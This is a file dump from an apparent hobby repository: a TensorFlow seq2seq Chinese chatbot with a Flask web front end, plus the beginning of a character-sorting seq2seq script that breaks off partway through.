[ { "alpha_fraction": 0.6787319779396057, "alphanum_fraction": 0.6852377653121948, "avg_line_length": 36.659244537353516, "blob_id": "0969514d42df525050c46351f83a1394203326e0", "content_id": "ed038d61f40a2d1bc1fb0651c61b52ff446bf3ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18088, "license_type": "no_license", "max_line_length": 183, "num_lines": 449, "path": "/ChatBot/ChatBot.py", "repo_name": "Yang-shihong/Chat", "src_encoding": "UTF-8", "text": "#! /usr/bin/python3\n\nimport tensorflow as tf\nimport jieba\nimport numpy as np\nimport pickle\nimport sys\nimport os\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\nclass ChatBot():\n\t\n\tdef __init__(self, enc_embed_dim = 20, dec_embed_dim = 20\n\t\t\t\t,epoches = 10, batch_size = 10, learning_rate = 0.01\n\t\t\t\t,n_enc_hidden = [20,20], n_dec_hidden = [20,20]):\n\t\t'''\n\t\t初始化方法\n\t\tArgs:\n\t\t\tenc_embed_dim: Encoder端Embedding维度\n\t\t\tdec_embed_dim: Decoder端Embedding维度\n\t\t\tepoches: 迭代次数\n\t\t\tbatch_size: 每批次序列个数\n\t\t\tlearning_rate: 学习速率\n\t\t\tn_enc_hidden: Encoder端各隐藏层中的节点数 [N1, N2, ...]\n\t\t\tn_dec_hidden: Decoder端各隐藏层中的节点数 [M1, M2, ...]\n\t\t'''\n\t\tself._enc_embed_dim = enc_embed_dim\n\t\tself._dec_embed_dim = dec_embed_dim\n\t\tself._epoches = epoches\n\t\tself._batch_size = batch_size\n\t\tself._learning_rate = learning_rate\n\t\tself._n_enc_hidden = n_enc_hidden\n\t\tself._n_dec_hidden = n_dec_hidden\n\t\n\t\tself._source_vocab_size = 0\n\t\tself._target_vocab_size = 0\n\t\tself._source_id_word_map = None\n\t\tself._target_id_word_map = None\n\t\tself._source_word_id_map = None\n\t\tself._target_word_id_map = None\n\t\n\tdef get_id_word_map(self):\n\t\t'''\n\t\t获取映射表\n\t\t'''\n\t\treturn self._source_id_word_map, self._target_id_word_map, self._source_word_id_map, self._target_word_id_map\n\t\t\n\tdef set_id_word_map(self, source_id_word_map, target_id_word_map, source_word_id_map, target_word_id_map):\n\t\t'''\n\t\t设置映射表\n\t\t'''\n\t\tself._source_id_word_map = source_id_word_map\n\t\tself._target_id_word_map = target_id_word_map\n\t\tself._source_word_id_map = source_word_id_map\n\t\tself._target_word_id_map = target_word_id_map\n\t\t\n\t\tself._source_vocab_size = len(source_id_word_map) #Encoder层输入样本字典大小\n\t\tself._target_vocab_size = len(target_id_word_map) #Decoder层输入样本字典大小\n\t\n\tdef build_input_struct(self):\n\t\t'''\n\t\t构建模型输入样本结构\n\t\tArgs:\n\t\t\tencoder_input: Encoder层Mini-batch输入\n\t\t\tdecoder_input: Decoder层Mini-batch输入\n\t\t\tencoder_input_seq_len: Encoder层Mini-batch输入样本每个序列的长度\n\t\t\tdecoder_input_seq_len: Decoder层Mini-batch输入样本每个序列的长度\n\t\t\tdecoder_max_input_seq_len: Decoder层输入样本每批次序列最大长度\n\t\t'''\n\t\tencoder_input = tf.placeholder(dtype=tf.int32, shape=[None,None], name=\"encoder_input\")\n\t\tdecoder_input = tf.placeholder(dtype=tf.int32, shape=[None,None], name=\"decoder_input\")\n\t\tencoder_input_seq_len = tf.placeholder(dtype=tf.int32, shape=(None,), name=\"encoder_input_seq_len\")\n\t\tdecoder_input_seq_len = tf.placeholder(dtype=tf.int32, shape=(None,), name=\"decoder_input_seq_len\")\n\t\tdecoder_max_input_seq_len = tf.reduce_max(decoder_input_seq_len, name=\"decoder_max_input_seq_len\")\n\t\treturn encoder_input, decoder_input, encoder_input_seq_len, decoder_input_seq_len, decoder_max_input_seq_len\n\t\n\tdef read_data_sets(self, path):\n\t\t'''\n\t\t读取输入文件及对应目标输出数据文件\n\t\tArgs:\n\t\t\tpath: Q&A文件路径\n\t\tReturns:\n\t\t\tsource_ids: 对输入的索引Ids\n\t\t\ttarget_ids: 对对应目标输出的索引Ids\n\t\t'''\n\t\tsource_sentences = 
[]\n\t\ttarget_sentences = []\n\t\tsource_words = []\n\t\ttarget_words = []\n\t\t# 分词处理\n\t\tis_question = True\n\t\twith open(path, 'r', encoding='utf-8') as f:\n\t\t\tfor line in f:\n\t\t\t\tif line[0] == 'M':\n\t\t\t\t\tline = line[2:] # 去掉'M '\n\t\t\t\t\tif line[-1] == '\\n':\n\t\t\t\t\t\tline = line[:-1]\n\t\t\t\t\tword_gen = jieba.cut(line)\n\t\t\t\t\tif is_question:\n\t\t\t\t\t\tsource_sentences.append(list(word_gen))\n\t\t\t\t\t\tis_question = False\n\t\t\t\t\telse:\n\t\t\t\t\t\ttarget_sentences.append(list(word_gen))\n\t\t\t\t\t\tis_question = True\n\t\t\t\t\t\n\t\tsource_words = [word for sentence in source_sentences for word in sentence]\n\t\ttarget_words = [word for sentence in target_sentences for word in sentence]\n\t\t\n\t\t# 去重\n\t\tsource_words_unique = list(set(source_words))\n\t\ttarget_words_unique = list(set(target_words))\n\t\t\n\t\t# 添加特殊标志\n\t\tspecial_words = ['<GO>', '<EOS>', '<UNK>', '<PAD>']\n\t\t\n\t\t# id-word映射\n\t\tsource_id_word_map = {id:word for id, word in enumerate(source_words_unique+special_words)}\n\t\ttarget_id_word_map = {id:word for id, word in enumerate(target_words_unique+special_words)}\n\t\tself._source_vocab_size = len(source_id_word_map) #Encoder层输入样本字典大小\n\t\tself._target_vocab_size = len(target_id_word_map) #Decoder层输入样本字典大小\n\t\tself._source_id_word_map = source_id_word_map\n\t\tself._target_id_word_map = target_id_word_map\n\t\t\n\t\t# word-id映射\n\t\tsource_word_id_map = {word:id for id, word in enumerate(source_words_unique+special_words)}\n\t\ttarget_word_id_map = {word:id for id, word in enumerate(target_words_unique+special_words)}\n\t\tself._source_word_id_map = source_word_id_map\n\t\tself._target_word_id_map = target_word_id_map\n\t\t\n\t\tsource_sentences = source_sentences[:256]\n\t\ttarget_sentences = target_sentences[:256]\n\t\t# 对输入文本进行索引\n\t\tsource_ids = [[source_word_id_map[word] for word in sentence] for sentence in source_sentences]\n\t\ttarget_ids = [[target_word_id_map[word] for word in sentence] + [target_word_id_map['<EOS>']] for sentence in target_sentences]\n\t\t\n\t\tprint('source vocab size: {}'.format(self._source_vocab_size))\n\t\tprint('target vocab size: {}'.format(self._target_vocab_size))\n\t\t\n\t\t# 保存字典\n\t\tpickle.dump(source_word_id_map, open('./source_word_id_map.bin','wb'))\n\t\tpickle.dump(target_word_id_map, open('./target_word_id_map.bin','wb'))\n\t\tpickle.dump(source_id_word_map, open('./source_id_word_map.bin','wb'))\n\t\tpickle.dump(target_id_word_map, open('./target_id_word_map.bin','wb'))\n\t\t\n\t\treturn source_ids, target_ids\n\t\t\n\tdef word_embedding(self, ids, vocab_size, embed_dim):\n\t\t'''\n\t\tWord Embedding\n\t\tArgs:\n\t\t\tids: 待Embedding的输入\n\t\tReturns:\n\t\t\tEmbedding的序列\n\t\t'''\n\t\treturn tf.contrib.layers.embed_sequence(ids, vocab_size, embed_dim)\n\t\t\n\tdef build_encoder_layer(self):\n\t\t'''\n\t\t构建Encoder层\n\t\tReturn:\n\t\t\tencoder_model: Encoder模型\n\t\t'''\n\t\tdef build_lstm_cell(rnn_size):\n\t\t\t'''\n\t\t\t构建LSTM单元\n\t\t\t'''\n\t\t\tinit = tf.random_uniform_initializer(-1, 0.2, seed = 100, dtype = tf.float32)\n\t\t\treturn tf.contrib.rnn.LSTMCell(rnn_size, initializer = init)\n\t\tencoder_model = tf.contrib.rnn.MultiRNNCell([build_lstm_cell(rnn_size) for rnn_size in self._n_enc_hidden])\t\n\t\treturn encoder_model\n\t\t\n\tdef obtain_encoder_result(self, encoder_model, embed_input):\n\t\t'''\n\t\t输入embedding Mini-batch样本\n\t\t获取Encoder模型结果\n\t\tArgs:\n\t\t\tencoder_model: Encoder模型\n\t\t\tembed_input: embedding Mini-batch样本 [batch_size, seq_len, 
embed_dim]\n\t\tReturn:\n\t\t\toutputs: Encoder模型RNN单元的输出 [batch_size, seq_len, rnn_size]\n\t\t\tlast_states: Encoder模型RNN单元最后状态的输出, 一般为元组(c, h) [batch_size, rnn_size]\n\t\t'''\n\t\toutputs, last_states = tf.nn.dynamic_rnn(encoder_model, embed_input, sequence_length = self._encoder_input_seq_len, dtype=tf.float32)\n\t\treturn outputs, last_states\n\t\n\tdef obtain_decoder_input(self):\n\t\t'''\n\t\t获取Decoder模型的输入样本\n\t\tReturn:\n\t\t\tdecoder_input: 预处理后的Decoder输入\n\t\t'''\n\t\t#删除<EOS>标志,并添加<GO>作为Decoder输入\n\t\t#slice_input = tf.slice(self._decoder_input, [0,0], [self._batch_size, -1])\n\t\tslice_input = self._decoder_input[:,:-1]\n\t\tdecoder_input = tf.concat([tf.fill([self._batch_size,1], self._target_word_id_map['<GO>']), slice_input], 1)\n\t\treturn decoder_input\n\t\n\tdef build_decoder_layer(self):\n\t\t'''\n\t\t构建Decoder模型\n\t\tReturn:\n\t\t\tdecoder_model: Decoder模型\n\t\t'''\n\t\tdef build_lstm_cell(rnn_size):\n\t\t\t'''\n\t\t\t构建LSTM单元\n\t\t\t'''\n\t\t\tinit = tf.random_uniform_initializer(-1, 0.2, seed = 100, dtype = tf.float32)\n\t\t\treturn tf.contrib.rnn.LSTMCell(rnn_size, initializer = init)\n\t\tdecoder_model = tf.contrib.rnn.MultiRNNCell([build_lstm_cell(rnn_size) for rnn_size in self._n_dec_hidden])\n\t\treturn decoder_model\n\t\t\n\tdef obtain_decoder_result(self, encoder_state, decoder_model, decoder_input):\n\t\t'''\n\t\t得到Decoder模型的输出\n\t\tArgs:\n\t\t\tencoder_state: Encoder层状态输出\n\t\t\tdecoder_model: 构建的Decoder模型\n\t\t\tdecoder_input: Decoder层Mini-batch输入\n\t\tReturn:\n\t\t\tDecoder层训练及预测结果\n\t\t'''\n\t\tdecoder_embedding = tf.Variable(tf.random_uniform([self._target_vocab_size, self._dec_embed_dim]))\n\t\tembedding_decoder_input = tf.nn.embedding_lookup(decoder_embedding, decoder_input)\n\t\t\n\t\t# Decoder端输出全连接层\n\t\toutput_layer = tf.layers.Dense(self._target_vocab_size, kernel_initializer = tf.truncated_normal_initializer(mean=0.0, stddev=0.1))\n\t\t\n\t\twith tf.variable_scope('decode'):\n\t\t\t# only read inputs\n\t\t\ttrain_helper = tf.contrib.seq2seq.TrainingHelper(inputs = embedding_decoder_input, sequence_length = self._decoder_input_seq_len, time_major=False)\n\t\t\ttrain_decoder = tf.contrib.seq2seq.BasicDecoder(decoder_model, train_helper, encoder_state, output_layer)\n\t\t\ttrain_decoder_output, _, _ = tf.contrib.seq2seq.dynamic_decode(train_decoder, impute_finished=True, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tmaximum_iterations=self._decoder_max_input_seq_len)\n\t\twith tf.variable_scope('decode', reuse = True):\n\t\t\tstart_tokens = tf.tile(tf.constant([self._target_word_id_map['<GO>']], dtype=tf.int32), [self._batch_size])\n\t\t\tinfer_helper = tf.contrib.seq2seq.GreedyEmbeddingHelper(embedding = decoder_embedding, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tstart_tokens = start_tokens,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tend_token = self._target_word_id_map['<EOS>'])\n\t\t\tinfer_decoder = tf.contrib.seq2seq.BasicDecoder(decoder_model, infer_helper, encoder_state, output_layer)\n\t\t\tinfer_decoder_output, _, _ = tf.contrib.seq2seq.dynamic_decode(infer_decoder, impute_finished=True, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\tmaximum_iterations=self._decoder_max_input_seq_len)\n\t\treturn train_decoder_output, infer_decoder_output\n\t\n\t\n\tdef build_seq2seq_model(self):\n\t\t'''\n\t\t连接Encoder及Decoder形成Seq2Seq模型\n\t\tReturns:\n\t\t\ttrain_decoder_output: Decoder训练结果\n\t\t\tinfer_decoder_output: Decoder预测结果\t\n\t\t'''\n\t\t# 得到Encoder层Embedding后的Mini-batch输入\n\t\tencoder_embed_input = self.word_embedding(self._encoder_input, self._source_vocab_size, 
self._enc_embed_dim)\n\t\t# 构建Encoder模型\n\t\tencoder_model = self.build_encoder_layer()\n\t\t# 获取Encoder状态变量\n\t\t_, encoder_state = self.obtain_encoder_result(encoder_model, encoder_embed_input)\n\t\t# 获取Decoder输入\n\t\tdecoder_input = self.obtain_decoder_input()\n\t\t# 构建Decoder模型\n\t\tdecoder_model = self.build_decoder_layer()\n\t\t# 得到Decoder输出\n\t\ttrain_decoder_output, infer_decoder_output = self.obtain_decoder_result(encoder_state, decoder_model, decoder_input)\n\t\treturn train_decoder_output, infer_decoder_output\n\t\n\tdef pad_input(self, input, pad_int):\n\t\t'''\n\t\t补全输入样本\n\t\t使得每批次中各个序列的长度相等\n\t\tArgs:\n\t\t\tinput: Mini-batch样本\n\t\t\tpad_int: 补全符(整型)\n\t\tReturn:\n\t\t\tpadding_input: 补全之后的样本\n\t\t'''\n\t\tmax_len = max([len(item) for item in input])\n\t\tpadding_input = np.array([item + [pad_int]*(max_len-len(item)) for item in input])\n\t\treturn padding_input\n\t\n\t\n\tdef obtain_mini_batch(self, source_vocab_idx, target_vocab_idx):\n\t\t'''\n\t\t获取Mini-batch输入样本\n\t\tArgs:\n\t\t\tsource_vocab_idx: 输入样本索引列表\n\t\t\ttarget_vocab_idx: 理论输出索引列表\n\t\tReturn:\n\t\t\tpad_source_input_batch: 生成的输入Mini-batch(通过<PAD>进行了对齐)\n\t\t\tpad_target_input_batch: 对应的理论输出Mini-batch(通过<PAD>进行了对齐)\n\t\t\tsource_seq_len: 输入Mini-batch中每个序列的长度\n\t\t\ttarget_seq_len: 理论输出Mini-batch中每个序列的长度\n\t\t'''\n\t\tbatches = len(source_vocab_idx) // self._batch_size\n\t\tfor bat in range(batches):\n\t\t\tstart = bat*self._batch_size\n\t\t\tsource_input_batch = source_vocab_idx[start:start+self._batch_size]\n\t\t\ttarget_input_batch = target_vocab_idx[start:start+self._batch_size]\n\t\t\n\t\t\tpad_source_input_batch = self.pad_input(source_input_batch, self._source_word_id_map['<PAD>'])\n\t\t\tpad_target_input_batch = self.pad_input(target_input_batch, self._target_word_id_map['<PAD>'])\n\t\t\t\n\t\t\tsource_seq_len = []\n\t\t\ttarget_seq_len = []\t\n\t\t\tfor source in source_input_batch:\n\t\t\t\tsource_seq_len.append(len(source))\n\t\t\tfor target in target_input_batch:\n\t\t\t\ttarget_seq_len.append(len(target))\n\t\t\t\t\n\t\t\tyield pad_source_input_batch, pad_target_input_batch, source_seq_len, target_seq_len\n\t\t\t\n\tdef build_train_graph(self):\n\t\t'''\n\t\t构建训练图模型\n\t\tReturns:\n\t\t\ttrain_graph: 训练图\n\t\t\ttrain_op: 训练动作\n\t\t\tloss: 训练损失\n\t\t'''\n\t\ttrain_graph = tf.Graph()\n\t\twith train_graph.as_default():\n\t\t\tself._encoder_input, self._decoder_input \\\n\t\t\t,self._encoder_input_seq_len, self._decoder_input_seq_len, self._decoder_max_input_seq_len = self.build_input_struct()\n\t\t\ttrain_decoder_output, infer_decoder_output = self.build_seq2seq_model()\n\t\t\ttraining_logits = tf.identity(train_decoder_output.rnn_output, 'logits')\n\t\t\tinfer_logits = tf.identity(infer_decoder_output.sample_id, 'infer')\n\t\t\tmasks = tf.sequence_mask(self._decoder_input_seq_len, self._decoder_max_input_seq_len, dtype=tf.float32, name='masks')\n\t\t\twith tf.name_scope('optimization'):\n\t\t\t\tloss = tf.contrib.seq2seq.sequence_loss(training_logits, self._decoder_input, masks)\n\t\t\t\toptimizer = tf.train.AdamOptimizer(self._learning_rate)\n\t\t\t\tgradients = optimizer.compute_gradients(loss)\n\t\t\t\tcapped_gradients = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in gradients if grad is not None]\n\t\t\t\ttrain_op = optimizer.apply_gradients(capped_gradients)\n\t\treturn train_graph, train_op, loss\t\t\n\t\t\t\n\t\t\t\n\tdef train(self, source_vocab_idx, target_vocab_idx):\n\t\t'''\n\t\t开始训练\n\t\tArgs:\n\t\t\tsource_vocab_idx: 同read_data_sets中source_ids\n\t\t\ttarget_vocab_idx: 
同read_data_sets中target_ids\n\t\t'''\n\t\t# 将样本分为训练集及验证集\n\t\ttrain_source_vocab_idx = source_vocab_idx[self._batch_size:]\n\t\ttrain_target_vocab_idx = target_vocab_idx[self._batch_size:]\n\t\t# 其中一个batch_size作为验证集\n\t\t#valid_source_vocab_idx = source_vocab_idx[:self._batch_size]\n\t\t#valid_target_vocab_idx = target_vocab_idx[:self._batch_size]\n\t\ttrain_graph, train_op, loss = self.build_train_graph()\n\t\tcheckpoint = \"./trained_model.ckpt\"\n\t\twith tf.Session(graph=train_graph) as sess:\n\t\t\tsess.run(tf.global_variables_initializer())\n\t\t\tfor epo in range(self._epoches):\n\t\t\t\tfor bat,(pad_source_input_batch, pad_target_input_batch, source_seq_len, target_seq_len) in enumerate(\t\t\n\t\t\t\t\tself.obtain_mini_batch(train_source_vocab_idx, train_target_vocab_idx)):\n\t\t\t\t\t_, cost = sess.run(\n\t\t\t\t\t\t[train_op, loss],\n\t\t\t\t\t\tfeed_dict={\n\t\t\t\t\t\tself._encoder_input: pad_source_input_batch,\n\t\t\t\t\t\tself._decoder_input: pad_target_input_batch,\n\t\t\t\t\t\tself._encoder_input_seq_len: source_seq_len,\n\t\t\t\t\t\tself._decoder_input_seq_len: target_seq_len})\n\t\t\t\t\tif bat % self._batch_size == 0:\n\t\t\t\t\t\tprint('Epoch: {:>3}/{} - Batch: {:>4}/{} - Training loss: {:>6.3f}'\n\t\t\t\t\t\t\t.format(epo+1, self._epoches, bat+1, len(train_source_vocab_idx)//self._batch_size, cost))\n\t\t\t# 保存模型\n\t\t\tsaver = tf.train.Saver()\n\t\t\tsaver.save(sess, checkpoint)\n\t\t\tprint(\"Save Model Success.\")\n\n\tdef build_infer_input(self, input):\n\t\t'''\n\t\t构建预测时的输入样本\n\t\tArgs:\n\t\t\tinput: 原始输入\n\t\tReturn:\n\t\t\tinfer_input_seq: 处理后的输入序列\n\t\t\twords_length: 分词后的长度\n\t\t'''\n\t\tmax_infer_seq_length = 15\n\t\twords = list(jieba.cut(input))\n\t\twords_length = len(words)\n\t\tpad = self._source_word_id_map['<PAD>']\n\t\tinfer_input_seq = [self._source_word_id_map.get(item, self._source_word_id_map['<UNK>']) for item in words] + [self._source_word_id_map['<PAD>']]*(max_infer_seq_length-words_length)\n\t\treturn infer_input_seq, words_length\n\t\t\n\tdef infer(self, question):\n\t\t'''\n\t\t开始预测\n\t\tArgs:\n\t\t\tquestion: 问题\n\t\tReturns:\n\t\t\tanswer: 针对某个问题的回答\n\t\t'''\n\t\tif self._source_id_word_map is None or self._target_id_word_map is None or self._source_word_id_map is None or self._target_word_id_map is None:\n\t\t\tsource_id_word_map = pickle.load(open('./source_id_word_map.bin','rb'))\n\t\t\ttarget_id_word_map = pickle.load(open('./target_id_word_map.bin','rb'))\n\t\t\tsource_word_id_map = pickle.load(open('./source_word_id_map.bin','rb'))\n\t\t\ttarget_word_id_map = pickle.load(open('./target_word_id_map.bin','rb'))\n\t\t\tself.set_id_word_map(source_id_word_map, target_id_word_map, source_word_id_map, target_word_id_map)\n\t\tinfer_input_seq, words_length = self.build_infer_input(question)\n\n\t\tcheckpoint = \"./trained_model.ckpt\"\n\n\t\tloaded_graph = tf.Graph()\n\t\twith tf.Session(graph=loaded_graph) as sess:\n\t\t\t# 加载模型\n\t\t\tloader = tf.train.import_meta_graph(checkpoint + '.meta')\n\t\t\tloader.restore(sess, checkpoint)\n\n\t\t\tencoder_input = loaded_graph.get_tensor_by_name('encoder_input:0')\n\t\t\tlogits = loaded_graph.get_tensor_by_name('infer:0')\n\t\t\tencoder_input_seq_len = loaded_graph.get_tensor_by_name('encoder_input_seq_len:0')\n\t\t\tdecoder_input_seq_len = loaded_graph.get_tensor_by_name('decoder_input_seq_len:0')\n\t\t\t\n\t\t\tinfer_logits = sess.run(logits, {encoder_input: [infer_input_seq]*self._batch_size, \n\t\t\t\t\t\t\t\t\t\t\tencoder_input_seq_len: [words_length]*self._batch_size, 
\n\t\t\t\t\t\t\t\t\t\t\tdecoder_input_seq_len: [words_length]*self._batch_size})[0]\n\t\tpad = self._source_word_id_map[\"<PAD>\"]\n\t\teos = self._source_word_id_map[\"<EOS>\"]\n\t\tanswer = \" \".join([self._target_id_word_map[i] for i in infer_logits if i != pad or i != eos])\n\t\tprint('Origin input:', question)\n\t\tprint('\\nSource')\n\t\tprint('\tWord Number:\t\t{}'.format([i for i in infer_input_seq]))\n\t\tprint('\tInput Words: {}'.format(\" \".join([self._source_id_word_map[i] for i in infer_input_seq])))\n\t\tprint('\\nTarget')\n\t\tprint('\tWord Number:\t\t\t {}'.format([i for i in infer_logits if i != pad]))\n\t\tprint('\tResponse Words: {}'.format(answer))\n\t\treturn answer\n\n\n\nif __name__ == '__main__':\n\tif len(sys.argv) < 2:\n\t\tprint('Params should equal 2. Example: python ChatBot.py <train/predict>')\n\tif sys.argv[1] == 'train':\n\t\tpath = 'data/xiaohuangji50w_nofenci.conv'\n\t\tchatBot = ChatBot()\n\t\tsource_vocab_idx, target_vocab_idx = chatBot.read_data_sets(path)\n\t\tprint('----------start training---------')\n\t\tchatBot.train(source_vocab_idx, target_vocab_idx)\n\t\tprint('----------training finish--------')\n\tif sys.argv[1] == 'predict':\n\t\tprint('----------start predict----------')\n\t\tchatBot = ChatBot()\n\t\tprint('----------load dict success-----')\n\t\tanswer = chatBot.infer('你在干嘛')" }, { "alpha_fraction": 0.6985981464385986, "alphanum_fraction": 0.7009345889091492, "avg_line_length": 20.450000762939453, "blob_id": "aca2bac11a4714e6c1da87bad3588cf6870ad1ce", "content_id": "afc1374988ec721c41fc24da5723875023a85479", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 454, "license_type": "no_license", "max_line_length": 47, "num_lines": 20, "path": "/ChatBot/chat_web.py", "repo_name": "Yang-shihong/Chat", "src_encoding": "UTF-8", "text": "#! /user/bin/python3\n\nfrom flask import Flask,render_template,request\nfrom ChatBot import ChatBot\n\napp = Flask(__name__)\t\t#创建一个wsgi应用\n\n@app.route('/')\ndef chat_page():\n\treturn render_template(\"chat.html\")\n\n@app.route('/obtain_answer')\ndef obtain_answer():\n\tquestion = request.args.get('question')\n\tchatBot = ChatBot()\n\tanswer = chatBot.infer(question)\n\treturn answer\n\nif __name__ == '__main__':\n\tapp.run(debug=True)\t\t#启动app的调试模式" }, { "alpha_fraction": 0.6726070642471313, "alphanum_fraction": 0.6782115697860718, "avg_line_length": 36.99282455444336, "blob_id": "c99f387abb15f3b3c212ea470765273eba6092a3", "content_id": "57ae0bcfeacb361750fb8aa4b7e21329e25b39b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17222, "license_type": "no_license", "max_line_length": 157, "num_lines": 418, "path": "/sort_char.py", "repo_name": "Yang-shihong/Chat", "src_encoding": "UTF-8", "text": "#! 
/usr/bin/python3\n\nimport tensorflow as tf\nimport numpy as np\n\n# ------- 超参数设置 --------\n# 迭代次数\nepoches = 10\n# 每批次序列个数\nbatch_size = 128\n# RNN模型LSTM单元个数\nrnn_size = 30\n# RNN模型隐藏层层数\nrnn_layer = 2\n# Embedding维度\nencoder_embed_dim = 20\ndecoder_embed_dim = 20\n# 学习速率\nlearning_rate = 0.01\n# 每隔ITER次打印一次\nITER = 1000\n\n\ndef build_input(input_path, is_target):\n '''\n 构造输入样本\n Params:\n input_path: 训练样本路径\n is_target: 处理的输入文本是否是对应目标输出文件\n Return:\n vocab_idx: 输入样本的索引列表\n len(ch_to_int: 样本序列的长度\n ch_to_int: 输入样本字符-索引映射\n int_to_ch: 输入样本索引-字符映射\n '''\n with open(input_path, 'r') as f:\n text = f.read()\n #print(text)\n words = text.split('\\n')\n #print(words)\n special_words = ['<PAD>', '<UNK>', '<GO>', '<EOS>']\n vocab = list(set([ch for item in (words) for ch in item])) #去重\n #print(vocab)\n int_to_ch = {idx : ch for idx, ch in enumerate(vocab+special_words)}\n ch_to_int = {ch : idx for idx, ch in enumerate(vocab+special_words)}\n # 将各个单词用索引进行表示\n if is_target:\n vocab_idx = [[ch_to_int.get(ch, ch_to_int['<UNK>']) for ch in item] + [ch_to_int['<EOS>']] for item in words]\n else:\n vocab_idx = [[ch_to_int.get(ch, ch_to_int['<UNK>']) for ch in item] for item in words]\n return vocab_idx, len(ch_to_int), ch_to_int, int_to_ch\n\ndef build_input_struct():\n '''\n 构建模型输入样本结构\n '''\n encoder_input = tf.placeholder(dtype=tf.int32, shape=[None,None], name=\"encoder_input\")\n decoder_input = tf.placeholder(dtype=tf.int32, shape=[None,None], name=\"decoder_input\")\n encoder_input_seq_len = tf.placeholder(dtype=tf.int32, shape=(None,), name=\"encoder_input_seq_len\")\n decoder_input_seq_len = tf.placeholder(dtype=tf.int32, shape=(None,), name=\"decoder_input_seq_len\")\n decoder_max_input_seq_len = tf.reduce_max(decoder_input_seq_len, name=\"decoder_max_input_seq_len\")\n #print(decoder_max_input_seq_len)\n return encoder_input, decoder_input, encoder_input_seq_len, decoder_input_seq_len, decoder_max_input_seq_len\n\ndef embedding_encoder_input(input, vocab_size, embed_dim):\n '''\n 对encoder输入进行embedding\n Params:\n input: 输入样本\n vocab_size: 字典单词个数\n embed_dim: embedding维数\n Return:\n embedding处理后的样本\n '''\n return tf.contrib.layers.embed_sequence(input, vocab_size, embed_dim)\n\ndef build_encoder_layer(rnn_size, rnn_layer):\n '''\n 构建Encoder层\n Params:\n rnn_size: 每层RNN(LSTM)单元个数\n rnn_layer: Encoder层数\n Return:\n encoder_model: Encoder模型\n '''\n def build_lstm_cell(rnn_size):\n '''\n 构建LSTM单元\n '''\n init = tf.random_uniform_initializer(-1, 0.2, seed = 100, dtype = tf.float32)\n return tf.contrib.rnn.LSTMCell(rnn_size, initializer = init)\n encoder_model = tf.contrib.rnn.MultiRNNCell([build_lstm_cell(rnn_size) for _ in range(rnn_layer)]) \n return encoder_model\n \ndef obtain_encoder_result(encoder_model, embed_input, input_seq_len):\n '''\n 输入embedding Mini-batch样本\n 获取Encoder模型结果\n Params:\n encoder_model: Encoder模型\n embed_input: embedding Mini-batch样本 [batch_size, seq_len, embed_dim]\n input_seq_len: Mini-batch样本序列长度 [batch_size] \n Return:\n outputs: Encoder模型RNN单元的输出 [batch_size, seq_len, rnn_size]\n last_states: Encoder模型RNN单元最后状态的输出, 一般为元组(c, h) [batch_size, rnn_size]\n '''\n outputs, last_states = tf.nn.dynamic_rnn(encoder_model, embed_input, sequence_length = input_seq_len, dtype=tf.float32)\n return outputs, last_states\n \ndef obtain_decoder_input(target_input, batch_size):\n '''\n 获取Decoder模型的输入样本\n Params:\n target_inputs: Decoder理论输出样本\n batch_size: 序列个数\n Return:\n decoder_input: 预处理后的Decoder输入\n '''\n #删除<EOS>标志,并添加<GO>作为Decoder输入\n slice_input = tf.slice(target_input, 
[0,0], [batch_size,-1])\n decoder_input = tf.concat([tf.fill([batch_size,1], target_ch_to_int['<GO>']), slice_input], 1)\n return decoder_input\n \ndef build_decoder_layer(rnn_size, rnn_layer):\n '''\n 构建Decoder模型\n Params:\n rnn_size: 每层RNN(LSTM)单元个数\n rnn_layer: Decoder层数\n Return:\n decoder_model: Decoder模型\n '''\n def build_lstm_cell(rnn_size):\n '''\n 构建LSTM单元\n '''\n init = tf.random_uniform_initializer(-1, 0.2, seed = 100, dtype = tf.float32)\n return tf.contrib.rnn.LSTMCell(rnn_size, initializer = init)\n decoder_model = tf.contrib.rnn.MultiRNNCell([build_lstm_cell(rnn_size) for _ in range(rnn_layer)]) \n return decoder_model\n \ndef obtain_decoder_result(encoder_state, decoder_model, \n decoder_input, embed_dim, vocab_size, input_seq_len,\n decoder_max_input_seq_len):\n '''\n 得到Decoder模型的输出\n Params:\n encoder_state: Encoder层状态输出\n decoder_model: 构建的Decoder模型\n decoder_input: Decoder层Mini-batch输入\n embed_dim: Embedding维度\n vocab_size: Decoder层输入样本字典大小\n input_seq_len: 输入序列中每个样本的长度 [batch_size]\n decoder_max_input_seq_len: Decoder层输入样本每批次序列最大长度\n Return:\n Decoder层训练及预测结果\n '''\n decoder_embedding = tf.Variable(tf.random_uniform([vocab_size, embed_dim]))\n embedding_decoder_input = tf.nn.embedding_lookup(decoder_embedding, decoder_input)\n with tf.variable_scope('decode'):\n train_helper = tf.contrib.seq2seq.TrainingHelper(inputs = embedding_decoder_input, sequence_length = input_seq_len, time_major=False)\n train_decoder = tf.contrib.seq2seq.BasicDecoder(decoder_model, train_helper, encoder_state)\n train_decoder_output, _, _ = tf.contrib.seq2seq.dynamic_decode(train_decoder, impute_finished=True, \n maximum_iterations=decoder_max_input_seq_len)\n with tf.variable_scope('decode', reuse = True):\n start_tokens = tf.tile(tf.constant([target_ch_to_int['<GO>']], dtype=tf.int32), [batch_size])\n infer_helper = tf.contrib.seq2seq.GreedyEmbeddingHelper(embedding = decoder_embedding, \n start_tokens = start_tokens,\n end_token = target_ch_to_int['<EOS>'])\n infer_decoder = tf.contrib.seq2seq.BasicDecoder(decoder_model, infer_helper, encoder_state)\n infer_decoder_output, _, _ = tf.contrib.seq2seq.dynamic_decode(infer_decoder, impute_finished=True, \n maximum_iterations=decoder_max_input_seq_len)\n return train_decoder_output, infer_decoder_output\n\ndef build_seq2seq_model(encoder_input, decoder_input, \n source_vocab_size, target_vocab_size, \n encoder_embed_dim, decoder_embed_dim, \n encoder_input_seq_len, decoder_input_seq_len,\n decoder_max_input_seq_len):\n '''\n 连接Encoder及Decoder形成Seq2Seq模型\n Params:\n 